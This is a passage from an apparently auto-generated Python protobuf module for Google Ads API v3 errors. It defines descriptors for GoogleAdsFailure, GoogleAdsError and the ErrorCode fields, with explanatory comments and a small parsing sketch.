    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_adx__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_asset__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_asset__link__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_authentication__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_authorization__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_bidding__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_bidding__strategy__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_billing__setup__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_campaign__budget__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_campaign__criterion__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_campaign__draft__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_campaign__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_campaign__experiment__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_campaign__feed__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_campaign__shared__set__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_change__status__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_collection__size__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_context__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_conversion__action__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_conversion__adjustment__upload__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_conversion__upload__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_country__code__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_criterion__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_currency__code__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_custom__interest__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_customer__client__link__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_customer__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_customer__feed__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_customer__manager__link__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_database__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_date__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_date__range__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_distinct__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_enum__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_extension__feed__item__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_extension__setting__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_feed__attribute__reference__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_feed__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_feed__item__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_feed__item__target__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_feed__item__validation__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_feed__mapping__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_field__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_field__mask__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_function__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_function__parsing__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_geo__target__constant__suggestion__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_header__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_id__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_image__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_internal__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_invoice__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_keyword__plan__ad__group__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_keyword__plan__campaign__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_keyword__plan__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_keyword__plan__idea__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_keyword__plan__keyword__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_keyword__plan__negative__keyword__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_label__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_language__code__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_list__operation__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_manager__link__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_media__bundle__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_media__file__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_media__upload__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_multiplier__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_mutate__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_mutate__job__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_new__resource__creation__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_not__empty__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_not__whitelisted__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_null__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_offline__user__data__job__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_operation__access__denied__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_operator__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_partial__failure__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_payments__account__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_policy__finding__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_policy__validation__parameter__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_policy__violation__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_query__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_quota__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_range__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_reach__plan__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_recommendation__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_region__code__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_request__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_resource__access__denied__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_resource__count__limit__exceeded__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_setting__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_shared__criterion__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_shared__set__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_size__limit__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_string__format__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_string__length__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_time__zone__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_url__field__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_user__data__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_user__list__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_youtube__video__registration__error__pb2.DESCRIPTOR,
    google_dot_protobuf_dot_wrappers__pb2.DESCRIPTOR,
    google_dot_api_dot_annotations__pb2.DESCRIPTOR,
  ])
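
# The Descriptor objects below mirror, message by message, the definitions in
# google/ads/googleads_v3/proto/errors/errors.proto: GoogleAdsFailure,
# GoogleAdsError, the ErrorCode oneof wrapper, ErrorLocation (with its nested
# FieldPathElement), ErrorDetails, PolicyViolationDetails and
# PolicyFindingDetails. They are data only; the concrete message classes are
# typically built from them later in this module by protobuf's reflection
# machinery.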
_GOOGLEADSFAILURE = _descriptor.Descriptor(
name='GoogleAdsFailure',
full_name='google.ads.googleads.v3.errors.GoogleAdsFailure',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='errors', full_name='google.ads.googleads.v3.errors.GoogleAdsFailure.errors', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=7356,
serialized_end=7438,
)
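
# GoogleAdsFailure is the top-level error payload: a single repeated field
# `errors` (field number 1) holding GoogleAdsError messages. A minimal usage
# sketch, assuming the generated GoogleAdsFailure class defined later in this
# module and a hypothetical `data` bytes object holding a serialized failure:
#
#   failure = GoogleAdsFailure()
#   failure.ParseFromString(data)   # standard protobuf deserialization
#   for error in failure.errors:
#       print(error.message)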
_GOOGLEADSERROR = _descriptor.Descriptor(
name='GoogleAdsError',
full_name='google.ads.googleads.v3.errors.GoogleAdsError',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='error_code', full_name='google.ads.googleads.v3.errors.GoogleAdsError.error_code', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='message', full_name='google.ads.googleads.v3.errors.GoogleAdsError.message', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='trigger', full_name='google.ads.googleads.v3.errors.GoogleAdsError.trigger', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='location', full_name='google.ads.googleads.v3.errors.GoogleAdsError.location', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='details', full_name='google.ads.googleads.v3.errors.GoogleAdsError.details', index=4,
number=5, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=7441,
serialized_end=7721,
)
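
# GoogleAdsError carries the diagnostics for one failed operation: an
# `error_code` (which of the many error enums fired), a human-readable
# `message`, the `trigger` value that caused the error, the `location` of the
# offending field, and extra `details`. As a sketch, the field path behind a
# failure can be walked like this (each `index` is a google.protobuf.Int64Value
# wrapper, so the integer lives in its `.value` attribute):
#
#   for element in error.location.field_path_elements:
#       print(element.field_name, element.index.value)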
_ERRORCODE = _descriptor.Descriptor(
name='ErrorCode',
full_name='google.ads.googleads.v3.errors.ErrorCode',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='request_error', full_name='google.ads.googleads.v3.errors.ErrorCode.request_error', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='bidding_strategy_error', full_name='google.ads.googleads.v3.errors.ErrorCode.bidding_strategy_error', index=1,
number=2, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='url_field_error', full_name='google.ads.googleads.v3.errors.ErrorCode.url_field_error', index=2,
number=3, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='list_operation_error', full_name='google.ads.googleads.v3.errors.ErrorCode.list_operation_error', index=3,
number=4, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='query_error', full_name='google.ads.googleads.v3.errors.ErrorCode.query_error', index=4,
number=5, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='mutate_error', full_name='google.ads.googleads.v3.errors.ErrorCode.mutate_error', index=5,
number=7, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='field_mask_error', full_name='google.ads.googleads.v3.errors.ErrorCode.field_mask_error', index=6,
number=8, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='authorization_error', full_name='google.ads.googleads.v3.errors.ErrorCode.authorization_error', index=7,
number=9, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='internal_error', full_name='google.ads.googleads.v3.errors.ErrorCode.internal_error', index=8,
number=10, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='quota_error', full_name='google.ads.googleads.v3.errors.ErrorCode.quota_error', index=9,
number=11, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='ad_error', full_name='google.ads.googleads.v3.errors.ErrorCode.ad_error', index=10,
number=12, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='ad_group_error', full_name='google.ads.googleads.v3.errors.ErrorCode.ad_group_error', index=11,
number=13, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='campaign_budget_error', full_name='google.ads.googleads.v3.errors.ErrorCode.campaign_budget_error', index=12,
number=14, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='campaign_error', full_name='google.ads.googleads.v3.errors.ErrorCode.campaign_error', index=13,
number=15, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='authentication_error', full_name='google.ads.googleads.v3.errors.ErrorCode.authentication_error', index=14,
number=17, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='ad_group_criterion_error', full_name='google.ads.googleads.v3.errors.ErrorCode.ad_group_criterion_error', index=15,
number=18, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='ad_customizer_error', full_name='google.ads.googleads.v3.errors.ErrorCode.ad_customizer_error', index=16,
number=19, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='ad_group_ad_error', full_name='google.ads.googleads.v3.errors.ErrorCode.ad_group_ad_error', index=17,
number=21, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='ad_sharing_error', full_name='google.ads.googleads.v3.errors.ErrorCode.ad_sharing_error', index=18,
number=24, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='adx_error', full_name='google.ads.googleads.v3.errors.ErrorCode.adx_error', index=19,
number=25, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='asset_error', full_name='google.ads.googleads.v3.errors.ErrorCode.asset_error', index=20,
number=107, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='bidding_error', full_name='google.ads.googleads.v3.errors.ErrorCode.bidding_error', index=21,
number=26, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='campaign_criterion_error', full_name='google.ads.googleads.v3.errors.ErrorCode.campaign_criterion_error', index=22,
number=29, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='collection_size_error', full_name='google.ads.googleads.v3.errors.ErrorCode.collection_size_error', index=23,
number=31, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='country_code_error', full_name='google.ads.googleads.v3.errors.ErrorCode.country_code_error', index=24,
number=109, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='criterion_error', full_name='google.ads.googleads.v3.errors.ErrorCode.criterion_error', index=25,
number=32, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='customer_error', full_name='google.ads.googleads.v3.errors.ErrorCode.customer_error', index=26,
number=90, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='date_error', full_name='google.ads.googleads.v3.errors.ErrorCode.date_error', index=27,
number=33, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='date_range_error', full_name='google.ads.googleads.v3.errors.ErrorCode.date_range_error', index=28,
number=34, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='distinct_error', full_name='google.ads.googleads.v3.errors.ErrorCode.distinct_error', index=29,
number=35, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='feed_attribute_reference_error', full_name='google.ads.googleads.v3.errors.ErrorCode.feed_attribute_reference_error', index=30,
number=36, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='function_error', full_name='google.ads.googleads.v3.errors.ErrorCode.function_error', index=31,
number=37, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='function_parsing_error', full_name='google.ads.googleads.v3.errors.ErrorCode.function_parsing_error', index=32,
number=38, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='id_error', full_name='google.ads.googleads.v3.errors.ErrorCode.id_error', index=33,
number=39, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='image_error', full_name='google.ads.googleads.v3.errors.ErrorCode.image_error', index=34,
number=40, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='language_code_error', full_name='google.ads.googleads.v3.errors.ErrorCode.language_code_error', index=35,
number=110, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='media_bundle_error', full_name='google.ads.googleads.v3.errors.ErrorCode.media_bundle_error', index=36,
number=42, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='media_upload_error', full_name='google.ads.googleads.v3.errors.ErrorCode.media_upload_error', index=37,
number=116, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='media_file_error', full_name='google.ads.googleads.v3.errors.ErrorCode.media_file_error', index=38,
number=86, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='multiplier_error', full_name='google.ads.googleads.v3.errors.ErrorCode.multiplier_error', index=39,
number=44, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='new_resource_creation_error', full_name='google.ads.googleads.v3.errors.ErrorCode.new_resource_creation_error', index=40,
number=45, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='not_empty_error', full_name='google.ads.googleads.v3.errors.ErrorCode.not_empty_error', index=41,
number=46, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='null_error', full_name='google.ads.googleads.v3.errors.ErrorCode.null_error', index=42,
number=47, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='operator_error', full_name='google.ads.googleads.v3.errors.ErrorCode.operator_error', index=43,
number=48, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='range_error', full_name='google.ads.googleads.v3.errors.ErrorCode.range_error', index=44,
number=49, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='recommendation_error', full_name='google.ads.googleads.v3.errors.ErrorCode.recommendation_error', index=45,
number=58, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='region_code_error', full_name='google.ads.googleads.v3.errors.ErrorCode.region_code_error', index=46,
number=51, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
